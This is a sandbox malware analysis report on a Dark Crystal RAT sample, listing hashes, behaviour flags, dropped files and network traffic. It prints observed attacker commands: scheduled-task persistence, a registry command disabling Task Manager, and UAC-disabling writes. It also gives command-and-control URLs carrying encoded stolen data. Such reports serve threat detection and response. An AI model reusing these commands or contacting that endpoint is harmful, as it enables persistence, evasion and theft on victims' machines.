| File name: | winupd.exe |
| Full analysis: | https://app.any.run/tasks/ca589059-a359-4f4b-8cc3-0e27a5664575 |
| Verdict: | Malicious activity |
| Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
| Analysis date: | February 15, 2025, 21:35:07 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | 2ECF13B2FFDEC170C8C741B8BC4A20C5 |
| SHA1: | D40C32E97D65A877816A015CFFE2A8940DEBEA0D |
| SHA256: | 70C558209D7201E690991BE17A01C6EF7F5B14775F2CFB288F0ABAFA43187FE2 |
| SSDEEP: | 98304:ZFrKdQOUq0sil6vpFol2Zj0UJNdnuRa7OTuvF7/N/i1AS1lNPOJISy4EwWBQdVEK:ZUK4yPlT38 |
MALICIOUS
UAC/LUA settings modification
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
DCRAT mutex has been found
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Uses sleep, probably for evasion detection (SCRIPT)
- wscript.exe (PID: 3876)
- wscript.exe (PID: 5604)
- wscript.exe (PID: 444)
DARKCRYSTAL has been detected (SURICATA)
- RuntimeBroker.exe (PID: 2972)
Actions looks like stealing of personal data
- RuntimeBroker.exe (PID: 2972)
Steals credentials from Web Browsers
- RuntimeBroker.exe (PID: 2972)
SUSPICIOUS
Executable content was dropped or overwritten
- winupd.exe (PID: 3984)
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Executing commands from a ".bat" file
- wscript.exe (PID: 3876)
- winupd.exe (PID: 3984)
- comServer.exe (PID: 4320)
Runs shell command (SCRIPT)
- wscript.exe (PID: 3876)
The executable file from the user directory is run by the CMD process
- comServer.exe (PID: 4740)
- comServer.exe (PID: 904)
Starts CMD.EXE for commands execution
- winupd.exe (PID: 3984)
- wscript.exe (PID: 3876)
- comServer.exe (PID: 4320)
The process executes VB scripts
- winupd.exe (PID: 3984)
- RuntimeBroker.exe (PID: 2972)
Reads security settings of Internet Explorer
- winupd.exe (PID: 3984)
- ShellExperienceHost.exe (PID: 2136)
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
The process creates files with name similar to system file names
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
Executed via WMI
- schtasks.exe (PID: 5304)
- schtasks.exe (PID: 440)
- schtasks.exe (PID: 4472)
- schtasks.exe (PID: 2012)
- schtasks.exe (PID: 3220)
- schtasks.exe (PID: 5256)
- schtasks.exe (PID: 1876)
- schtasks.exe (PID: 3220)
- schtasks.exe (PID: 4592)
- schtasks.exe (PID: 5304)
- schtasks.exe (PID: 5256)
- schtasks.exe (PID: 4388)
- schtasks.exe (PID: 5128)
- schtasks.exe (PID: 1556)
- schtasks.exe (PID: 3836)
- schtasks.exe (PID: 4740)
- schtasks.exe (PID: 1876)
- schtasks.exe (PID: 5888)
- schtasks.exe (PID: 4132)
- schtasks.exe (PID: 4388)
- schtasks.exe (PID: 4160)
- schtasks.exe (PID: 1348)
- schtasks.exe (PID: 2496)
- schtasks.exe (PID: 4132)
- schtasks.exe (PID: 1876)
- schtasks.exe (PID: 2972)
- schtasks.exe (PID: 3552)
- schtasks.exe (PID: 4164)
- schtasks.exe (PID: 2380)
- schtasks.exe (PID: 1668)
- schtasks.exe (PID: 3296)
- schtasks.exe (PID: 5684)
- schtasks.exe (PID: 2496)
- schtasks.exe (PID: 4128)
- schtasks.exe (PID: 4164)
- schtasks.exe (PID: 5888)
Likely accesses (executes) a file from the Public directory
- schtasks.exe (PID: 5304)
- schtasks.exe (PID: 5256)
- schtasks.exe (PID: 4388)
Application launched itself
- comServer.exe (PID: 4740)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 4652)
Reads the date of Windows installation
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Probably delay the execution using 'w32tm.exe'
- cmd.exe (PID: 2356)
Starts itself from another location
- comServer.exe (PID: 904)
Executes as Windows Service
- VSSVC.exe (PID: 4840)
- WmiApSrv.exe (PID: 6404)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 444)
- wscript.exe (PID: 5604)
Uses WMI to retrieve WMI-managed resources (SCRIPT)
- wscript.exe (PID: 5604)
Checks for external IP
- svchost.exe (PID: 2192)
- RuntimeBroker.exe (PID: 2972)
The process checks if it is being run in the virtual environment
- RuntimeBroker.exe (PID: 2972)
Loads DLL from Mozilla Firefox
- RuntimeBroker.exe (PID: 2972)
INFO
Creates files or folders in the user directory
- winupd.exe (PID: 3984)
Reads the computer name
- winupd.exe (PID: 3984)
- comServer.exe (PID: 4740)
- ShellExperienceHost.exe (PID: 2136)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Checks supported languages
- winupd.exe (PID: 3984)
- ShellExperienceHost.exe (PID: 2136)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- comServer.exe (PID: 4740)
- RuntimeBroker.exe (PID: 2972)
Drops encrypted VBS script (Microsoft Script Encoder)
- winupd.exe (PID: 3984)
The sample compiled with english language support
- winupd.exe (PID: 3984)
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Process checks computer location settings
- winupd.exe (PID: 3984)
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- RuntimeBroker.exe (PID: 2972)
- comServer.exe (PID: 904)
Reads Environment values
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Process checks whether UAC notifications are on
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Reads the machine GUID from the registry
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
- RuntimeBroker.exe (PID: 2972)
Creates files in the program directory
- comServer.exe (PID: 4740)
- comServer.exe (PID: 4320)
- comServer.exe (PID: 904)
Create files in a temporary directory
- comServer.exe (PID: 4320)
- RuntimeBroker.exe (PID: 2972)
Disables trace logs
- RuntimeBroker.exe (PID: 2972)
Reads the time zone
- RuntimeBroker.exe (PID: 2972)
Checks proxy server information
- RuntimeBroker.exe (PID: 2972)
Reads the software policy settings
- RuntimeBroker.exe (PID: 2972)
Reads CPU info
- RuntimeBroker.exe (PID: 2972)
Reads Microsoft Office registry keys
- RuntimeBroker.exe (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:12:01 18:00:55+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 201216 |
| InitializedDataSize: | 114176 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1ec40 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
Total processes
181
Monitored processes
59
Malicious processes
10
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 440 | schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\PCHealthCheck\kk-KZ\dllhost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 444 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a2544bd3-86cd-4b84-aac7-a7b49dd1df48.vbs" | C:\Windows\System32\wscript.exe | — | RuntimeBroker.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 904 | "C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe" | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 1348 | schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1544 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.bat" " | C:\Windows\SysWOW64\cmd.exe | — | winupd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 255 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1556 | schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Application Data\winlogon.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1616 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1668 | schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\found.000\dir_00000002.chk\RuntimeBroker.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1876 | schtasks.exe /create /tn "uhssvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\uhssvc.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1876 | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
16 066
Read events
15 982
Write events
84
Delete events
0
Modification events
| (PID) Process: | (3984) winupd.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids |
| Operation: | write | Name: | VBEFile |
Value: | |||
| (PID) Process: | (3984) winupd.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids |
| Operation: | write | Name: | VBSFile |
Value: | |||
| (PID) Process: | (4740) comServer.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | EnableLUA |
Value: 0 | |||
| (PID) Process: | (4740) comServer.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 | |||
| (PID) Process: | (4740) comServer.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | PromptOnSecureDesktop |
Value: 0 | |||
| (PID) Process: | (4740) comServer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 23004100430042006C006F00620000000000000000000000010000000000000000000000 | |||
| (PID) Process: | (2136) ShellExperienceHost.exe | Key: | \REGISTRY\A\{5990eaaa-9b89-2e14-ce82-5d4afb9ebbe0}\LocalState |
| Operation: | write | Name: | PeekBadges |
Value: 5B005D00000060E89688F17FDB01 | |||
| (PID) Process: | (4740) comServer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\3645904f5767e188620c7a665cb0a97161785213 |
| Operation: | write | Name: | a9a2250d8cd79de1542cb78d3d051e7b79af13d9 |
Value: WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxTdXJyb2dhdGVhZ2VudHdpbmhvc3RTdmNcXGNvbVNlcnZlci5leGUiLCJDOlxcUHJvZ3JhbSBGaWxlc1xcV2luZG93cyBOVFxcbHNhc3MuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXENvbW1vbiBGaWxlc1xcU2VydmljZXNcXHVoc3N2Yy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXEFwcGxpY2F0aW9uIERhdGFcXHdpbmxvZ29uLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxQQ0hlYWx0aENoZWNrXFxray1LWlxcZGxsaG9zdC5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcTXVzaWNcXFN5c3RlbVNldHRpbmdzLmV4ZSJd | |||
| (PID) Process: | (1876) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | DisableTaskMgr |
Value: 1 | |||
| (PID) Process: | (4320) comServer.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | EnableLUA |
Value: 0 | |||
Executable files
14
Suspicious files
26
Text files
20
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\file.vbs | text | |
MD5:677CC4360477C72CB0CE00406A949C61 | SHA256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B | |||
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.bat | text | |
MD5:B67C9BB396B21E0E95E7DD8F7C60D663 | SHA256:EA9788B3ACCECECD55CBAC9547BDEACC5FFCA6AFCC539F3EBCA6E6E145A628EE | |||
| 3984 | winupd.exe | C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe | executable | |
MD5:19AD0B4DE848E37C6CF895F988A4506E | SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C | |||
| 4740 | comServer.exe | C:\Program Files\Windows NT\lsass.exe | executable | |
MD5:19AD0B4DE848E37C6CF895F988A4506E | SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C | |||
| 4740 | comServer.exe | C:\Users\Default\AppData\Roaming\winlogon.exe | executable | |
MD5:19AD0B4DE848E37C6CF895F988A4506E | SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C | |||
| 4740 | comServer.exe | C:\Program Files\PCHealthCheck\kk-KZ\dllhost.exe | executable | |
MD5:19AD0B4DE848E37C6CF895F988A4506E | SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C | |||
| 4320 | comServer.exe | C:\Windows\InputMethod\SHARED\5b884080fd4f94 | text | |
MD5:8CFC8C28BB4950B8234AEACD2FB9D96A | SHA256:0ACE73A57235432CF87B3BDA4B4EFF44566D7926E5FCA1DF2629EBD106335673 | |||
| 4740 | comServer.exe | C:\Program Files\Windows NT\6203df4a6bafc7 | text | |
MD5:C3F871C12DBDB68DD9F2D22D8305D1F0 | SHA256:A5EC3D0C7CE0AB817E18274E09DC859D1D4DF1E7D9CBD9777A57CFC74718B279 | |||
| 4320 | comServer.exe | C:\Program Files\PCHealthCheck\audiodg.exe | executable | |
MD5:19AD0B4DE848E37C6CF895F988A4506E | SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C | |||
| 4320 | comServer.exe | C:\Users\admin\AppData\Local\Temp\eKkRp5CLZW | text | |
MD5:2A3BD2179AE3105C3E31DBE022CF2945 | SHA256:380DA32CAD57497A167AFB748B1DF355BD3D3CC87BC1AD9310A3D471C29365DA | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
109
TCP/UDP connections
24
DNS requests
8
Threats
7
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4300 | svchost.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4300 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&714839bee31f9c5256b219d4a9de7452=d1nIxczY0cDN0Y2YhFWZ2ADO4AjNxIWO1MWMkJWZxU2MyczM2Y2N2IjYxIiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W&cf8ea13bf03810691a09f6ee9c86037a=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 | unknown | — | — | malicious |
2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&714839bee31f9c5256b219d4a9de7452=d1nI2UzY4YTN5YjZyUWOwQDNxEWNwcjN1czM1IWN0UTN3ATMmhTNiNWMxIiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&8840cb222f57329aad528a7e4bfbb468=d1nIkJ1VaBjSYlFMOhUS1xmMaFDeHV1ZwMUSOJkRJdXVq9UMNp2T1E0UOlXQq1kdVRVT2lkeXJiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiI5ATMykzM0MjNhJDOmhTZ4MDMkRGNhJGM5UmY1YWNhRDOiRGO5QGZlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W | unknown | — | — | malicious |
